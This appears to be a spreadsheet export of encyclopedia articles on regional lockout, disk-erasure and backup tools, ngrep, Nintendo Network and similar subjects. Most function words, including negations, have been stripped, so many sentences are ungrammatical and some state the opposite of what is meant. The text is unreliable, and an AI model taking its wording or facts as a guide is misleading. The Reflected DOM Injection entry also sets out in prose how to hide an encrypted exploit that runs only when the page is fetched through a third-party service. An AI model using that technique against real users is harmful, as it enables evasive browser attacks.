(and even that, could still extra sound functionalities famicom differing hardware). official adapters existed inside early copies gyromite could disassembled swapped different famicom game. additionally, also contained 10nes authentication chip; chip coded four regions: ntsc (north america) pal-a (united kingdom, australia italy) pal-b (other european countries south korea) asia (south east asia, india, hong kong)a game's region recognized console using 10nes chip. chip inside cartridge conflicts chip inside console, game boot. 10nes chip also doubled form digital rights management prevent loading unlicensed bootleg games. redesigned nintendo entertainment system (model nes-101) released 1993/1994 lacks 10nes chip, play unlicensed games, although famicom games still need converter. famicom include 10nes chip, still unable play imports unless adapter used, different size media. american super nintendo entertainment system (snes) super famicom differences cartridge cases. super cartridge super famicom/pal snes slot different shape pieces plastic snes slot prevent super famicom cartridges inserted snes. snes carts fully inserted japanese consoles, similar chip 10nes, called cic, prevents games played ntsc consoles vice versa. while physical modification cases (either console cartridges) needed play games different regions, order play games different systems, hardware modification also needed. region locks could bypassed using special unlicensed cartridge adapters game genie. swapping cartridge shells also bypasses physical regional lockout. nintendo features similar lockout methods super nes. gamecube region-locked, shop channel also region-locked. channels regions display error message "this channel can't used." coded regions are: ntsc-u (the americas asia) (europe oceania) ntsc-j (japan) ntsc-k (south korea)the gamecube wii's regional lockout bypassed either console modification (the also bios hacking, homebrew channel), simply third party software. datel's freeloader action replay discs notable. also region-locked. nintendo also region-locked gamepads.not counting nes-101 "top loader", nintendo switch nintendo's first region-free console, region-free fullest extent, games nintendo eshop purchased downloaded regardless region.these regions are: japan americas (north/south america) europe oceania (australia/new zealand) asia pacific (hong kong/taiwan/south korea) (versions 8.0.0 later)before version 8.0.0, asian countries belonged americas, like nintendo exception chinese version nintendo switch distributed tencent mainland china. this version play cartridge games region, able connect chinese servers, thus access game updates, online modes imported games, download said games digitally. versions nintendo switch also unable play cartridges released specifically tencent chinese nintendo switch.all nintendo handhelds except nintendo models nintendo fully region-free. case former, physical digital games cannot played earlier models region-locked. latter's region lock strictly applies software designed exception application nintendo guide: louvre, game itself. sony playstation playstation region-locked three regions: ntsc u/c, ntsc-j, pal. however, possible disable region locking playstation using chip swap magic disc.all playstation games, except persona arena samurai region free. although publishers could choose region-lock specific games based mechanism allows game query model ps3, none first three years ps3's launch. case persona arena; publisher atlus declined reverse decision despite substantial outcry fanbase. decision made avoid excessive importing, versions game share features language support, differing price points release dates region. they did, however, decide apply region-locking sequel (persona arena ultimax). there region locking backwards-compatible playstation playstation games, well blu-ray disc movies. additionally, games separate online players region, metal gear solid guns patriots. playstation store contains content country. example, store supply usable packs imported copy call duty modern warfare. addition, downloadable content playstation systems region-matched game, need playstation store game. more specifically, ps3's file system includes region-of-origin, cannot shared different region games much like save files cannot. also, store tied user's account, payment methods also region-locked. example, user japanese account able access japanese store despite owning ps3, game japanese gift card japanese credit card. however, rare exceptions, notably joysound dive, downloaded content store also region free, psone classics offered store. although playstation portable region locking games; movies locked region. however, sony confirmed possible implement region-locking psp, firmware disable features based region. example, asian region psps display "extras" option despite upgraded version firmware 6.20, preventing owners psps installing comic book viewer streaming applications. applications installed users region blocked downloading them, possible install non-asian psps imported region. while playstation vita games potential region-locked, games released system region-free. like predecessors, playstation playstation region-locked, although still possible develop region-locked games. sony's official stance discourage developers region-locking relent special cases persona arena). however, playstation digital content downloadable content games still requires account region content made for. that said, accounts region-locked account region made console another one. sega sg-1000 region lockout japanese australian systems, applies sc-3000 games cartridge cassettes, well sf-7000 disks. western sega master systems different shape japanese cartridge connector, meaning sega mark sg-1000 games incompatible bios included prevents japanese cartridges (both mark sg-1000) used western systems, even adapters. sega card slot systems pinout japanese counterpart, cannot japanese sg-1000 cards lack certain code header. this circumvented removing bios however, european-only games back future part refuse boot ntsc systems. japanese games power base converter adapters, sg-1000 games, regardless region. japanese sega mega drive cartridges different shape genesis mega drive slot, shape (although genesis accept japanese titles wider slot.) japanese mega drive systems piece plastic slides place cartridge power switch turned thus, inserting american european cart make impossible japanese (though minor modifications plastic locks systems bypass this). console main board, however, designed language frequency jumper sets originally activated features different regions. this feature later used enable software-based regional locks display warning messages prevent game played. switches, instead jumpers, used bypass locks. region-locked games, multiple language feature, changed switches game booted-up case cyber brawl/cosmic carnage super 32x). despite console region-locked, games, especially ones made sega, region-free could played region, unless cartridge console. sega game gear region free, games dual language depending system used, puyo puyo (game name changes puzlow kids) donald magical world (ronald magical world), japan-exclusive games, western units, fully translated. sega mega-cd games region-locked. region changed making cd-r copies always possible (i.e. sengoku denshou american consoles hang sega license screen region-changed cd-r copy). furthermore, third party accessories exist allow booting regional sega bios flashcart adapter main console's cartridge slot. mega work connected genesis. however share voltage sega most american sega saturn discs played japanese consoles, japanese games locked american european consoles. like mega drive/genesis, switch circumvent region-lock change language. addition, certain unlicensed backup/ram cartridges also allow console play games different regions, except games proprietary rom-ram carts. games different television systems graphical problems. sega dreamcast gd-rom discs region-locked, could circumvented boot discs. mil-cds backup region-free. microsoft xbox xbox region-locked, games region-free play region. digital content xbox live xbox original xbox also region-locked, dlc, movies, apps. xbox initially planned region blocking policy would prevented outside region effort curb parallel importing. microsoft later reversed policy final retail version console region-locked. reported, though, console would region-locked china. however, decision since reverted april 2015. other philips cd-i interactive multiplayer region-free. japanese units, however, kanji font rom, required games. when games can't find font, locked rendered unplayable. pocket line also region-free. amongst games, regional lockout difficult enforce game application operating system easily modified. subscription-based online games often enforce regional lock blocking addresses (which often circumvented open proxy) requiring user enter national number (which impossible verify). number games using regional lockout rare exist. examples windows version orange box, uses steam enforce regional lockout. steam also enforces form regional lockout adherence german offering german users special versions games banned content notably swastikas replaced. steam also used restrict release port metal gear rising: revengeance europe sony exclusivity deal konami asia, restrict asian release final fantasy xiii trilogy japanese-only versions games. besides licensing issues, also financial reason steam region lock games, since russia countries prices games steam much lower north america. printers hewlett-packard printer cartridges regionalised since 2004. thus work printers different region code, unless user calls technical support device reassigned appropriate region.hp printers four regions: americas, greenland, australia, zealand, koreas, mongolia, pakistan, nepal, bhutan, bangladesh, east asia western europe, turkey cis, africa, near east, japan china (except hong kong taiwan) indiathe region changed three times; then, printer locked region. lexmark printers different region-coding systems: e.g. officeedge pro4000, officeedge pro4000c, officeedge pro5500, officeedge pro5500t, cs310, cs410 color laser printer americas greenland, efta cs310, cs410 color laser printer called region former yugoslavian states, except members croatia slovenia, rest world (east europe, africa, near east, asia, australia)b) e.g. ms710, ms810 monochrome laser printer usa, canada greenland, efta asia, australia, zealand central south america former yugoslavian states (except croatia slovenia), eastern europe, turkey, near east, africacanon print cartridges pixma work printers type different region code either (even listed packaging canon printer cartridges question). epson cartridges also region-coded. xerox also uses region codes. their printers shipped neutral "factory" sticks region coding. upon installation first stick factory sticks, machine region code based installed stick accept stick region point forward. "officially, three starter sticks color used; then, printer longer accept want region-coded sticks inserted, workarounds problem. common region settings are: (north america) metered-na (developing markets, asia south america) (europe). circumvention method bypass printer-region-coding store empty cartridges region refill cartridges region, many modern cartridges chips sensors prevent refilling, makes process difficult. some manufacturers regionalized printers also offer region-free printers specially designed travelers. also anti-refilling protections used printer manufacturers. smartphones, tablets, computers samsung devices starting samsung galaxy note samsung phones tablets contained warning label stating would operate cards region phone sold spokesperson clarified policy, stating intended prevent grey-market reselling, applied first card inserted. devices card regions, following actions totaling five minutes longer length must first performed card local region: make calls phone watch samsung phone call text other devices feature make calls changes 2017 samsung changed region locking policy completely since first introduced 2013. previously, generally decided based region phone meant for, could changed user input. card plays central role deciding active. south korea, canada, china phone/tablet purchased countries card different region, cannot used together. although restriction removed using local card make call least minutes, removes restrictions particular country. furthermore, device work properly circumstances, samsung pay. unlocked device purchased markets work service providers within market device purchased from, despite bands work networks. example, buys xaa/oym device united states living china using chinese sim, active changed chc/oym, firmware include multi-csc file. result, card cannot used device made another market. phones south korea u/u1: united states canada china, taiwan, hong kong, macao tablets south korea u/u1: united states canada china mainland regions rules still apply usual, however, countries unlocked use. example, buys dbt/oxm device germany living portugal using portuguese sim, active potentially tph/oxm, makes card usable region. phones latin america caribbean, middle east north africa, india, asia pacific europe tablets countries except south korea, usa, canada, mainland china fall section. country specific codes (cscs) samsung devices wi-fi devices 2022, samsung simplified cscs larger one. assume service providers supported region. example, buys xar/oxm tablet united states living taiwan using chinese phone taiwanese card paired tablet, active devices potentially bri/oxm, makes paired phone usable region. however, card mainland china, cannot paired tablet, since mainland china (chn) part multi-csc file. with release galaxy series, southeast asia asia pacific (apac include indonesia, south korea, japan, china (china, taiwan, hong kong)). koo: south korea xar: north america (usa) xac: north america (canada) mxo: latin america (mexico) zbr: latin america (other) eux: europe euy: europe ser: (russia) sek: (ukraine) cau: (caucasus) ilo: middle east (israel) tur: middle east (turkey) xsg: middle east (other, formerly uae) inu: india xsp: asia pacific (formerly singapore/southeast asia) bri: china (taiwan) tgy: china (hong kong) cellular devices okr: south korea (cellular devices only) oym/oyn: united states (cellular devices only) oya/oyv: canada (cellular devices only) owo: latin america (all devices?) ojm: middle east africa (some devices) odm: india (some devices) olm/olo: southeast asia (excluding indonesia) oceania (some devices) ole/olp: indonesia (all devices, excluding smartwatches) oxe: post-soviet states (some devices) chn/chc: mainland china (all devices) ozs: taiwan hong kong (some devices) xjp: japan (some devices) oxm: europe/all countries (including us/canada/south korea wi-fi devices)as galaxy wi-fi devices longer region locked, call text other devices features devices work cards regions (excluding mainland china). regions (except mainland china) share firmware version. windows devices starting windows phone mobile devices windows computers, display languages preinstalled/available download devices license windows. users display languages listed options device options available download separate language packs. these exact options depend device manufacturer country/region purchase (and mobile operator, device features cellular connectivity). microsoft believes region locking necessary display languages (which contains additional features like text suggestions, speech languages, supplementary fonts) take significant amount storage, leaves less space data media impacts device performance. cellular-connected devices, mobile operators choose support particular languages. example, wireless carrier north america feel comfortable supporting european languages. credit cards protection theft misuse foreign countries, credit cards locked certain regions. card holder wants travel abroad credit card there, lock certain region temporarily deactivated bank. banks offer service yet, region systems used vary banks. example, sparkasse schwyz (switzerland) uses following system: region switzerland liechtenstein region europe (including turkey greenland; overseas territories region code location.) (regions usually locked.)region russia region africa region canada region (except american samoa, guam, northern mariana islands, puerto rico, virgin islands) mexico region latin america caribbean region middle east (except turkey egypt), asia-pacific, australia also 10nes translation geo-blocking modchip ntsc-c ntsc-j ntsc region parallel import parallel importing video games trusted platform module references external links regional coding travel guide wikivoyage</t>
  </si>
  <si>
    <t>Redkey USB</t>
  </si>
  <si>
    <t>redkey computer utility developed securely erase data. sold bootable live drive redkey software used perpetual license basis. history application first released august 2018 following kickstarter crowdfunding campaign. features design partly based feedback projects supporters contributed development.during 2019, second redkey crowdfunding campaign went viral indiegogo following video review linus tech tips. 2020, third redkey kickstarter crowdfunding campaign introduced ata-based internal erase technology split software three different editions home, professional ultimate. during 2021, redkey's software certified level adisa certification limited ssds mhds. following re-certification process 2022, upgraded level 2.in 2022, fourth campaign completed introducing dual usb-c product design, ability wipe mobile devices remote wiping capabilities. technology features utility designed intel based x86-64 mac. redkey’s software written uses linux debian platform. software utility erases data entire drives overwriting existing data. uses standards erase hidden areas, hpa. other features include unlimited use, reporting, scripting remote wipe. references external links official website</t>
  </si>
  <si>
    <t>NightMare (scareware)</t>
  </si>
  <si>
    <t>nightmare scareware program distributed fish disks amiga computer (fish #448). generally credited first scareware program type.the program developed patrick evans (nobleton, ontario, canada) 1990 free redistribute, source code available author. effects when nightmare executes, runs background. every five minutes, changes entire screen computer four fifths second image skull blood teeth bullet hole blood leaking plays echoing shriek audio channels. references</t>
  </si>
  <si>
    <t>Reflected DOM Injection</t>
  </si>
  <si>
    <t>reflected injection (rdi) evasive technique uses third party website construct execute attack. this technique implemented websites user-provided part service (e.g. translation services, caching services, etc.) order implement technique: take piece code would like hide using (“code find service receives user input described (“service choose feature unique service (e.g. element added service) create pseudo-unique “key”. encrypt code using host website, code attempt re-create decrypt content runtime. browse website using service decryption code execute re-generate key, decrypt hidden code, execute it.by using technique exploit triggered user followed expected flow accessed website using third party service. code, however, would execute browsing directly attacker's website. figure describes direct access website uses technique exploit user's browser. accessing website directly, exploit remained encrypted content sent client machine remains benign. figure describes attack scenario user accesses website uses technique using third party service service creates connection attacker's website, receives content, manipulates order provide service, delivers modified content user. this manipulation done service turns attacker's page malicious helping generate required decrypt malicious code. technique actually uses third party service create malicious content. technique provides following benefits: exploit hosted known legit service. content hosted attacker's website essentially legit accessed directly. malicious content revealed following full flow attack.the technique first presented defcon daniel chechik anat davidi. full scenario technique described paper published following conference trustwave spiderlabs blog... this site reliable.</t>
  </si>
  <si>
    <t>Nikto (vulnerability scanner)</t>
  </si>
  <si>
    <t>nikto free software command-line vulnerability scanner scans webservers dangerous files/cgis, outdated server software problems. performs generic server type specific checks. also captures prints cookies received. nikto code free software, data files uses drive program not. version 1.00 released december 2001. features nikto detect 6700 potentially dangerous files/cgis, checks outdated versions 1250 servers, version specific problems servers. also checks server configuration items presence multiple index files http server options, attempt identify installed servers software. scan items plugins frequently updated automatically updated. variations there variations nikto, macnikto. macnikto applescript shell script wrapper built apple's xcode interface builder, released terms gpl. provides easy access subset features available command-line version, installed along macnikto application. references external links cirt nikto page</t>
  </si>
  <si>
    <t>Nimbus (cloud computing)</t>
  </si>
  <si>
    <t>nimbus toolkit that, installed cluster, provides infrastructure service cloud client wsrf-based amazon wsdl service apis. nimbus free open-source software, subject requirements apache license, version nimbus supports hypervisors virtual machine schedulers portable batch system oracle grid engine. allows deployment self-configured virtual clusters contextualization. configurable respect scheduling, networking leases, usage accounting. requirements kernel-based virtual machine java 1.5+ python (2.4+) linux kernel's netfilter ebtables bridging firewall dhcp server also cloud computing comparison references external links official website</t>
  </si>
  <si>
    <t>Redo Rescue</t>
  </si>
  <si>
    <t>redo rescue, formerly redo backup recovery, free backup disaster recovery software. runs bootable linux image, features front partclone command line utility, capable bare-metal backup recovery disk partitions. external hard drives network shares. after long period inactivity since 2012, project resumed 2020 adopting shorter name: redo rescue. while project inactive, 2019, forked create rescuezilla longer based debian, ubuntu.in addition backup software, disk includes additional supporting programs baobab chntpw cryptsetup drivereset chromium fsarchiver geany gnome-disk-utility gparted grsync hdparm lshw-gtk partclone partimage photorec rsync smartctl testdisk also list data recovery software disk cloning list disk cloning software references external links redo rescue sourceforge redo rescue distrowatch archived version earlier official website</t>
  </si>
  <si>
    <t>Ngrep</t>
  </si>
  <si>
    <t>ngrep (network grep) network packet analyzer written jordan ritter. command-line interface, relies upon pcap library regex library. ngrep supports berkeley packet filter (bpf) logic select network sources destinations protocols, also allows matching patterns regular expressions data payload packets using grep syntax, showing packet data human-friendly way. ngrep open source application, source code available download ngrep site sourceforge. compiled ported multiple platforms, works many unix-like operating systems: linux, solaris, illumos, bsd, aix, also works microsoft windows. functionality ngrep similar tcpdump, ability look regular expression payload packet, show matching packets screen console. allows users unencrypted traffic passed network, putting network interface promiscuous mode. ngrep appropriate filter syntax, used debug plain text protocols interactions like http, smtp, ftp, dns, among others, search specific string pattern, using grep regular expression syntax.ngrep also used capture traffic wire store pcap dump files, read files generated sniffer applications, like tcpdump, wireshark. ngrep various options command line arguments. ngrep page unix-like operating systems show list available options. using ngrep examples, assumed eth0 used network interface. capture network traffic incoming/outgoing to/from eth0 interface show parameters following http (tcp/80) post methodsngrep eth0 "^get |^post port capture network traffic incoming/outgoing to/from eth0 interface show http (tcp/80) user-agent stringngrep eth0 "user-agent: port capture network traffic incoming/outgoing to/from eth0 interface show (udp/53) querys responsesngrep eth0 port security capturing network traffic interface requires special privileges superuser privileges platforms, especially unix-like systems. ngrep default behavior drop privileges platforms, running specific unprivileged user. like tcpdump, also possible ngrep specific purpose intercepting displaying communications another user computer, entire network. privileged user running ngrep server workstation connected device configured port mirroring switch, router, gateway, connected device used network traffic capture lan, man, wan, watch unencrypted information related login id's, passwords, urls content websites viewed network. supported protocols ipv4 ipv6, internet protocol version version tcp, transmission control protocol udp, user datagram protocol icmpv4 icmpv6, internet control message protocol version version igmp, internet group management protocol ethernet, ieee 802.3 ppp, point point protocol slip, serial line internet protocol fddi, fiber data distribution protocol token ring, ieee 802.5 also comparison packet analyzers snoop, command line packet analyzer included solaris illumos dsniff, packet sniffer traffic analysis tools netsniff-ng, free linux networking toolkit etherape, network mapping tool relies sniffing traffic tcptrace, tool analyzing logs produced tcpdump microsoft network monitor, packet analyzer xplico, network forensics analysis tool references external links official site ngrep ngrep linux page</t>
  </si>
  <si>
    <t>Nodezilla</t>
  </si>
  <si>
    <t>nodezilla peer-to-peer network software written (core, network agent) java (gui), part released general public license. attempts provide anonymity. features technically, nodezilla secured, distributed fault-tolerant routing system (aka grid network). main purpose serve link distributed services built (like chat, efficient video multicast streaming, file sharing, secured file store ...).nodezilla provides cache features; server create local replica data object. these local replicas provide faster access robustness network partitions. they also reduce network congestion localizing access traffic. assumed server infrastructure crash, leak information, become compromised, therefore order ensure data protection, redundancy encryption used. developers published source code network agent yet, independent validation provided level anonymity performed. currently offers three services: anonymous file sharing hierarchical multimedia streaming digital photo sharing selected friends.the project also offers plugin vuze, popular bittorrent client, enabling users publish distribute .torrent files without index tracker pages. also anonymous references</t>
  </si>
  <si>
    <t>Nobody (username)</t>
  </si>
  <si>
    <t>many unix variants, "nobody" conventional name user identifier owns files, privileged groups, abilities except every user has. normally enabled user account, i.e. home directory login credentials assigned. some systems also define equivalent group "nogroup". uses pseudo-user "nobody" group "nogroup" used, example, nfsv4 implementation linux idmapd, user group name incoming packet match known username system. common daemons nobody, especially servers, order limit damage could done malicious user gained control them. however, usefulness technique reduced daemon like this, gaining control daemon would provide control all. reason processes owned user ability send signals debugging facilities read even modify other's memory. modern practice, recommended linux standard base, create separate user account daemon. also user identifier principle least privilege privilege revocation (computing) references</t>
  </si>
  <si>
    <t>No-disc crack</t>
  </si>
  <si>
    <t>no-disc crack, no-cd crack no-dvd crack executable file special "byte patcher" program allows user circumvent certain compact disc copy protection schemes. they allow user computer software without insert required cd-rom dvd-rom. this form software cracking. no-cd cracks specific variety games software distributed cd-rom dvd-rom found internet various reverse engineering websites file sharing networks. no-cd cracks legal uses, creating backups legally owned software user right many countries) avoiding inconvenience placing dvd-rom drive every time software used, although also used circumvent laws many countries allowing execution full versions non-legally owned applications time-limited trials applications without original disc. addition cracked executable files byte patchers, protection sometimes thwarted producing mini image containing enough software's cd-rom contents needed bypass protection. this image mounted disk image emulator daemon tools "trick" user's computer's operating system (os) believing said disk image physical optical disk inserted physical optical drive attached computer. side benefit, data mounted disk images generally load much faster real disk would data stored hard drive. some programs, however, attempt discover disk image emulators refuse work found. other programs exist attempt hide presence disk image emulators protected software. however, software running virtualization suite windows virtual virtualbox, guest confused thinking "physical" disc. excerpt united states copyright regards computer software. 117. limitations exclusive rights: computer programs making additional copy adaptation owner copy. withstanding provisions section 106, infringement owner copy computer program make authorize making another copy adaptation computer program provided: copy adaptation created essential step utilization computer program conjunction machine used manner, copy adaptation archival purposes archival copies destroyed event continued possession computer program cease rightful. also image references</t>
  </si>
  <si>
    <t>Nintendo Network ID</t>
  </si>
  <si>
    <t>nintendo network nintendo's online service provides online functionality nintendo systems compatible games. announced january 2012 investors' conference, nintendo's second online service nintendo wi-fi connection. former president nintendo satoru iwata said, "unlike nintendo wi-fi connection, focused upon specific functionalities concepts, aiming establish platform various services available network consumers shall connected nintendo network service company make comprehensive proposals consumers." nintendo switch uses subscription-based nintendo switch online service instead using nintendo network online platform, although active nintendo network could still linked nintendo switch nintendo accounts. history pre-announcement january 2012, image theatrhythm final fantasy's released showing "nintendo network" icon corner box. speculated "nintendo network" rebranding nintendo wi-fi connection. announcement nintendo officially announced nintendo network january 2012. nintendo stated nintendo network entirely unified network system opposed rebranding nintendo wi-fi connection. nintendo stated nintendo network provide infrastructure online multiplayer (through universal friend codes nintendo user account system spotpass, eshop. during pre-e3 nintendo direct, nintendo clarified nintendo network would basis nintendo's social network known miiverse. nintendo network provide network infrastructure nintendo 3ds, initially planned future nintendo platforms. features notesnnid support nintendo eshop free downloads miiverse (sign-up/login only) swapnote/nintendo letter currently used local messaging since spotpass disabled globally october 2013. november 2016, succeeded swapdoodle.^[a] miiverse made available nintendo december 2013.discontinued services: spotpass ceased operations june 2012. eurosport ceased operations december 2012. nintendo show last episode aired march 2013. nintendo video ceased functions pulled eshop march 2014 japan region, june 2015 north america. however, name continues existing permanent nintendo eshop category north america, hosting many previous future video content demand. iplayer de-listed nintendo eshop august 2016, ceased operating january 2017 already downloaded service terminated licence agreement nintendo miiverse ceased operations november 2017. chat ceased operations november 2017. backward compatibility nintendo network previously provided legacy support nintendo ds/dsi systems, nintendo wi-fi connection absorbed service. this ensured uninterrupted online support general backwards compatibility legacy families game libraries played current nintendo 3ds. free nintendo wi-fi connection service globally discontinued 2014, ceased support online multiplayer, matchmaking, leaderboards nintendo games supported features, also applies legacy online support games played nintendo 3ds, including downloadable versions. shop channel officially shut january 2019, preventing games, channels, wiiware purchased downloaded. previous downloads still redownloaded data transferred system. user information nintendo network nintendo network (nnid) user account systems nintendo 3ds, allows players access certain online features nintendo eshop miiverse. december 2013, nintendo network implemented onto nintendo 3ds, becoming required downloading free demos eshop, replacing previous system eshop purchases tied single system. players nintendo able link single nintendo network systems, allowing funds added credit cards pre-paid cards shared across systems' eshops. however, nintendo network used system time, requiring players perform system transfer move account details system another (ids currently tied single system, though future update resolve promised, also essential company's long-term plans). players also sign nintendo network platforms, web-based miiverse portal computers, functionality tablets smartphones also planned.nintendo originally planned nintendo network become prominent account system standard future nintendo hardware releases, well nintendo-published apps released non-nintendo devices. however, march 2016, nintendo introduced nintendo account non-nintendo devices, nintendo switch launched year later, although account service complements nintendo network users one. example, users link nintendo network nintendo account, share eshop funds nintendo switch u/nintendo 3ds. april 2020, credential stuffing breaches outside nintendo included nnid user password information approximately 160,000 nintendo accounts becoming target malicious users would nnid login purchase digital goods account. april 2020, nintendo temporarily disabled nnid login method nintendo accounts, emailed affected users require password changes, recommended users enable two-factor authentication. nintendo stated june 2020 found additional 140,000 accounts also part breach, bringing total 300,000, reset passwords affected users sent notifications them. universal friend code system nintendo network currently uses universal friend code system account system nintendo 3ds. while friend codes registered user system, functional nintendo software used system. these friend codes still tied single system initially limited transference conditional online protocol. after nintendo network (nnid) introduced nintendo december 2013, limit system transfers waived, nnid accounts friend codes remain tied single system time. games japan, first games introduce nintendo network officially theatrhythm final fantasy tekken prime edition, released february 2012. first game officially introduced nintendo network outside japan icarus: uprising, released march 2012. most games released nintendo wi-fi connection support prior launch nintendo network later rebranded nintendo network compatible games, including nintendo launch titles nintendogs cats. nintendo network compatible games launched alongside 2012. ubisoft confirmed assassin's creed marvel avengers: battle earth would launch nintendo network support. online multiplayer feature nintendo network allows users play together internet. users nintendo currently play another entering friend's universal friend code nintendo 3ds's friends roster. alternatively, supported games allow users play internet without enter friend codes, feature called online communities, debuted mario kart process online multiplayer streamlined unified user account system first available launch later brought nintendo 3ds. user account system would eliminate need enter friend codes; instead, users enter another's user accounts. nintendo network also allows users share rankings review ranks others. software updates software updates, commonly known patches, available nintendo 3ds, since april 2012, since november 2012, system update. these system updates gave ability patch downloadable titles, well retail games, nintendo eshop home menu. these patches main purpose fixing security vulnerabilities bugs, improving usability performance. patches also downloaded using applications systems' download manager. nintendo eshop nintendo eshop online marketplace powered nintendo network. eshop allows users nintendo access purchase exclusive digital games, virtual console games, certain retail games. moreover, users obtain patches additional downloadable content digital downloads; in-game purchases also supported. before purchasing piece software, eshop allows users view ratings, screenshots, videos pertaining piece software. developers also release demos digital physical games eshop.currently, purchases made nintendo eshop nintendo tied system purchased from, transferred contacting nintendo's customer service. however, nintendo stated change launch nintendo network user account system. user's purchases tied nintendo network account cannot transferred systems user nintendo network account tied specific console. this user account system added nintendo system update december 2013, coinciding miiverse added system, allowing players combine funds account.in february 2022, nintendo announced they'll shutting nintendo eshop systems march 27th, 2023 11:00 gmt, ability funds removed august 29th, 2022 4:30 gmt. this shutdown also affect games nintendo eshop add-on content, streetpass plaza, nintendo badge arcade, sports club, mario kart super mario bros. however, users still able redownload software already purchased, download updates download small number free themes theme shop. also shutdown, pokémon bank application become free charge use. digital retail titles most nintendo retail software titles available download nintendo eshop. first titles super mario bros. nintendo 3ds, launched nintendo eshop alongside retail release august 2012. add-on content add-ons include downloadable content, addition features, patches. add-on software added digital physical games. demos game demos retail digital games available free download nintendo eshop since updated december 2011. developers required limit number plays available user. first paid demo released japan august 2011 free demos released japan december 2011 north america january 2012. virtual console virtual console, sometimes abbreviated specialized section nintendo eshop online service allow players purchase download games discontinued consoles software nintendo's wii, nintendo 3ds. uses menu nintendo eshop access purchase virtual console titles, respectively. virtual console games suspended users also create save states anytime. virtual console game bought nintendo eshop played gamepad off-tv play. entire virtual console library available also available implementation console's "wii mode" shop channel, access purchase virtual console titles. nintendo nintendo uses home menu nintendo eshop access purchase virtual console titles, respectively. virtual console games nintendo suspended users also create save states anytime. special features interpretation virtual console allow players create restore points, temporarily saving game state later, optional ability view games original resolution accompanied special borders. miiverse miiverse social network nintendo 3ds, created nintendo system development hatena powered nintendo network. discontinued november 2017. integrated every game, miiverse allowed players interact share experiences miis drawings, text, screenshots, sometimes game videos. nintendo tvii nintendo tvii free television based service allowed users unified system watch films programs content providers, formerly hulu plus, netflix, amazon video, cable network. users able select source program wish watch watch television gamepad. users could also gamepad screen information show watching. such information received wikipedia, imdb, rotten tomatoes, well individual source services. information provided gamepad show included reviews, screenshots, realtime player positions sports broadcasts, cast lists, trailers, general information show. despite initially launching late 2012 select countries, development plagued various technical issues delays, service failed launch europe, subsequently canceling plans launch oceania, later discontinued north america august 2015. nintendo tvii icon access since subsequently removed home menu 5.4.0e update consoles, 5.5.0u update north american consoles. social network integration since service connected nintendo network user personal information stored nintendo tvii, preferences, social network accounts. users interact information well share comment information social networks miiverse, facebook, twitter order share reactions live moments gamepad watch show screen. users also able control gamepad. nintendo tvii made nintendo partnership i.tv. integrated services nintendo tvii supported following services: hulu plus (united states only; japanese variant hulu available tvii) amazon video (united states only; european variant lovefilm available tvii) netflix (united states only; global variants netflix available tvii)future plans included bringing dvr, tivo nintendo tvii. originally announced service would become available europe 2013. however, happen, although nintendo since issued apology january 2014 launching service expected, stated expect announcements "near future". february 2015, nintendo europe announced cancelled plans service's release european countries including uk.the gamepad also used universal television remote built guide, even powered off. nintendo tvii installed every console, require additional fees use. discontinuation july 2015, nintendo announced service would discontinued north america august year 3:00 p.m. shortly termination, users started nintendo tvii, redirected screen showing service longer available. finally, august system update removed nintendo tvii icon menu home menu, thus making service longer accessible. august 2017, nintendo announced service would discontinued japan november 2017 3:00 jst. video services outside nintendo tvii, available nintendo network offers wide range video services nintendo 3ds. these services available download nintendo since nintendo tvii already integrated netflix, hulu plus, amazon video tivo. resolution 1080p, nintendo limited 240p. however, streaming services available independently nintendo network services, available resolutions vary service. these videos either downloaded system's permanent storage spotpass streamed user's internet connection. nintendo 3ds, many videos offered videos available. exact content available varies region. canceled services: spotpass ceased operations june 2012. eurosport ceased operations december 2012. nintendo show nintendo nintendo video gaming online magazine published future publishing nintendo network. produced team behind official nintendo magazine featured video reviews previews footage upcoming recently released nintendo games. episodes released monthly nintendo eshop, nintendo channel youtube users could watch latest news, reviews previews wii, nintendo nintendo virtual console games. series exclusive region consoles. nintendo show video gaming online show produced nintendo hosted jessie cantrell. featured video previews footage upcoming recently released nintendo retail digital game titles. episodes released every weeks nintendo eshop free charge. this series exclusive north american nintendo consoles. nintendo show released last episode march 2013. short films nintendo eshop offers wide range downloadable video content nintendo 3ds. these videos mostly offered downloaded right system's memory. order produce distribute short films nintendo partnered companies breakthru films, black productions, atlantic productions, ka-ching cartoons dreamworks animation. nintendo also planned expand video distribution service even larger companies like dreamworks, bringing exclusive content nintendo owners. chat services nintendo stated nintendo network provided means users chat text, voice, video. three means chatting available chat miiverse services. nintendo 3ds, swapnote (nintendo letter box) application allowed users send handwritten notes, pictures, sound another nintendo network, powered spotpass delivery service. users also able globally communicate another miiverse social network service. swapnote/nintendo letter swapnote messaging application nintendo 3ds. swapnote released december 2011 europe, australia north america nintendo eshop, downloaded additional cost, pre-installed newer systems. this application allowed users send hand-written/drawn messages registered friends spotpass users streetpass. also allows users freely embed pictures sounds messages, also lets users change position orientation picture sound icons. features unlocked players continue send letters, ability hand-write/draw messages, additional stationary features unlocked spending play coins. messages sent received also saved indefinitely, spite 3000 message limit. additional stationary obtained certain nintendo related events, using specific software, saving people's messages. october 2013, nintendo abruptly suspended swapnote/nintendo letter spotpass functionality discovering minors sharing friend codes strangers exploited messaging service allegedly exchange pornographic imagery. additionally, special notes service, also sent spotpass promote nintendo games, also suspended. nintendo issued apology using application responsible manner. swapdoodle without prior notice, nintendo released messaging application nintendo november 2016 entitled swapdoodle. regarded spiritual successor swapnote/nintendo letter box, supports exchange messages users online using spotpass, albeit user content limited drawings, handwritten text, icons, native in-game screenshots. additionally, swapdoodle access in-app store, allowing users purchase bundle packs include additional pens, units, stationery, message space, drawing lessons. chat chat online chat solution, powered nintendo network. service allowed users gamepad's front-facing camera video chat registered friends. while video chatting, gamepad needed, since picture gamepad's shown. users could also drawn gamepad chat session.if game another application already running, gamepad's home button ring flash indicating incoming call. idea feature originally seen introduction trailer 2011. however, users also able service multitasking application, therefore ability make video calls without interrupting game play. nintendo announced desire make video chat possible multitasking, never implemented. chat deployed launch firmware update. feature discontinued worldwide december 2017 3:00 jst. internet navigation technology nintendo family powered netfront previously, nintendo partnered opera software release internet channel original wii, nintendo browser. nintendo nintendo internet browser internet browser designed nintendo system. released firmware update june 2011 north america june 2011 europe japan. browser functions multitasking application. such, used another application, game, suspended background. browser primarily controlled stylus controlled circle d-pad cycle links page. browser supports html, css, javascript, html5 elements support flash, video, music files. also show image files .mpo file extension upper screen allow user save image card; also done jpeg files. additionally, browser supports file uploads forms, limiting jpeg images system's photo gallery. improved browser featured nintendo consoles, notably different interface ability play html5-based videos. internet browser internet browser designed system. released 